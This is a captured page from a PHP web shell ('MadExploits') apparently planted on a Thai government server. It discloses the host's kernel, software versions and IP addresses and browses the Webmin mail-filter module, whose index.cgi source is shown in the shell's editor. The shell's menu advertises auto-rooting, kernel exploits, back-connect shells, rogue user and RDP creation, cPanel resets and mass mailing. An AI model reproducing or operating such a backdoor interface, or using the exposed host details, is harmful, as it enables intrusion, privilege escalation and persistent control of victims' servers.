Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
filter /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
CHANGELOG
2.96
KB
-rw-r--r--
aliases-lib.pl
7.93
KB
-rwxr-xr-x
autoreply-file-lib.pl
2.28
KB
-rwxr-xr-x
config
218
B
-rw-r--r--
config.info
489
B
-rw-r--r--
config.info.ca
556
B
-rw-r--r--
config.info.ca.UTF-8
575
B
-rw-r--r--
config.info.cz
344
B
-rw-r--r--
config.info.cz.UTF-8
370
B
-rw-r--r--
config.info.de
598
B
-rw-r--r--
config.info.de.UTF-8
598
B
-rw-r--r--
config.info.el
264
B
-rw-r--r--
config.info.hu
0
B
-rw-r--r--
config.info.nl
584
B
-rw-r--r--
config.info.nl.UTF-8
584
B
-rw-r--r--
config.info.no
527
B
-rw-r--r--
config.info.no.UTF-8
527
B
-rw-r--r--
config.info.pl
580
B
-rw-r--r--
config.info.pl.UTF-8
604
B
-rw-r--r--
delete.cgi
431
B
-rwxr-xr-x
down.cgi
261
B
-rwxr-xr-x
edit.cgi
8.97
KB
-rwxr-xr-x
edit_auto.cgi
3.11
KB
-rwxr-xr-x
edit_forward.cgi
1.18
KB
-rwxr-xr-x
filter-lib.pl
17.71
KB
-rwxr-xr-x
index.cgi
4.33
KB
-rwxr-xr-x
module.info
260
B
-rw-r--r--
module.info.ca
109
B
-rw-r--r--
module.info.ca.UTF-8
121
B
-rw-r--r--
module.info.cz
39
B
-rw-r--r--
module.info.cz.UTF-8
52
B
-rw-r--r--
module.info.de
114
B
-rw-r--r--
module.info.de.UTF-8
126
B
-rw-r--r--
module.info.hu
81
B
-rw-r--r--
module.info.hu.UTF-8
104
B
-rw-r--r--
module.info.ms_MY
109
B
-rw-r--r--
module.info.ms_MY.UTF-8
121
B
-rw-r--r--
module.info.nl
34
B
-rw-r--r--
module.info.nl.UTF-8
40
B
-rw-r--r--
module.info.no
37
B
-rw-r--r--
module.info.no.UTF-8
43
B
-rw-r--r--
module.info.pl
114
B
-rw-r--r--
module.info.pl.UTF-8
130
B
-rw-r--r--
move.cgi
1.61
KB
-rwxr-xr-x
save.cgi
7.63
KB
-rwxr-xr-x
save_auto.cgi
2.73
KB
-rwxr-xr-x
save_forward.cgi
959
B
-rwxr-xr-x
up.cgi
259
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.cgi
#!/usr/bin/perl # Show a table of simple actions require './filter-lib.pl'; &ui_print_header(undef, $text{'index_title'}, "", undef, 0, 1); if (&get_product_name() eq 'webmin') { &ui_print_endpage($text{'index_nowebmin'}); } # Warn if procmail is not installed if ($config{'warn_procmail'} && !&has_command("procmail")) { print "$text{'index_warn'}<p>\n"; } # Check for an override alias $alias = &get_override_alias(); if ($alias) { # Got one .. but does it deliver locally $noat = $remote_user; $noat =~ s/\@/-/g; @values = @{$alias->{'values'}}; ($tome) = grep { $_ eq "\\$remote_user" || $_ eq "\\$noat" } @values; if ($tome) { @values = grep { $_ ne $tome } @values; $msg = 'index_aliasme'; } else { $msg = 'index_alias'; } print "<b>$text{$msg}</b><br>\n"; print "<ul>\n"; foreach $dest (&describe_alias_dest(\@values)) { print "<li>$dest\n"; } print "</ul>\n"; } # Check if /etc/procmailrc forces local delivery if (&no_user_procmailrc()) { print "<b>",$text{'index_force'},"</b><p>\n"; } @filters = &list_filters(); @links = ( ); if (@filters) { push(@links, &select_all_link("d"), &select_invert_link("d")); } push(@links, &ui_link("edit.cgi?new=1",$text{'index_add'})); ($auto) = grep { $_->{'actionreply'} } @filters; if (&can_simple_autoreply() && !$auto) { push(@links, &ui_link("edit_auto.cgi",$text{'index_addauto'})); } ($fwd) = grep { $_->{'actiontype'} eq '!' } @filters; if (&can_simple_forward() && !$fwd) { push(@links, &ui_link("edit_forward.cgi",$text{'index_addfwd'})); } @folders = &mailbox::list_folders(); if (@filters || &get_global_spamassassin()) { # Show table of filters print &ui_form_start("delete.cgi", "post"); @tds = ( "width=5", "width=50%", "width=50%", "width=32" ); print &ui_links_row(\@links); print &ui_columns_start([ "", $text{'index_condition'}, $text{'index_action'}, @filters > 1 ? ( $text{'index_move'} ) : ( ), ], 100, 0, \@tds); # Add a magic non-editable row(s) for global spamassassin run if (&get_global_spamassassin()) { print &ui_columns_row( [ "", $text{'index_calways'}, $text{'index_aspam'}, @filters > 1 ? ( "" ) : ( ) ], \@tds); # Delete level $spamlevel = &get_global_spam_delete(); if ($spamlevel) { print &ui_columns_row( [ "", &text('index_clevel', $spamlevel), $text{'index_athrow'}, @filters > 1 ? ( "" ) : ( ) ], \@tds); } # Delivery path $spamfile = &get_global_spam_path(); if ($spamfile) { $folder = &file_to_folder($spamfile, \@folders, 0, 1); $id = &mailbox::folder_name($folder); if ($folder->{'fake'}) { $sflink = "<u>$folder->{'name'}</u>"; } else { $sflink = "<a href='../mailbox/index.cgi?id=$id'>". "$folder->{'name'}</a>"; } print &ui_columns_row( [ "", $text{'index_cspam'}, &text('index_afolder', $sflink), @filters > 1 ? ( "" ) : ( ) ], \@tds); } } # Show editable rows foreach $f (@filters) { # Work out nice condition and action descriptions local $cond; ($cond, $lastalways) = &describe_condition($f); $cond = &ui_link("edit.cgi?idx=$f->{'index'}",$cond); local $action = &describe_action($f, \@folders); # Create mover links local $mover; if ($f eq $filters[0]) { $mover .= "<img src=images/gap.gif alt=' '>"; } else { $mover .= "<a href='up.cgi?idx=$f->{'index'}'>". "<img src=images/up.gif border=0 alt='Up'></a>"; } if ($f eq $filters[$#filters]) { $mover .= "<img src=images/gap.gif alt=' '>"; } else { $mover .= "<a href='down.cgi?idx=$f->{'index'}'>". "<img src=images/down.gif border=0 alt='Down'></a>"; } # Show the row print &ui_checked_columns_row( [ $cond, $action, @filters > 1 ? ( $mover ) : ( ) ], \@tds, "d", $f->{'index'} ); } # Add a magic non-editable row for default delivery if (!$lastalways) { print &ui_columns_row( [ "", $text{'index_calways'}, $text{'index_adefault'}, @filters > 1 ? ( "" ) : ( ) ], \@tds); } print &ui_columns_end(); print &ui_links_row(\@links); print &ui_form_end([ [ "delete", $text{'index_delete'} ] ]); } else { # Tell the user there are none @pmrc = &procmail::get_procmailrc(); if (@pmrc) { print "<b>$text{'index_none2'}</b><p>\n"; } else { print "<b>$text{'index_none'}</b><p>\n"; } print &ui_links_row(\@links); } &ui_print_footer("/", $text{'index'});
Close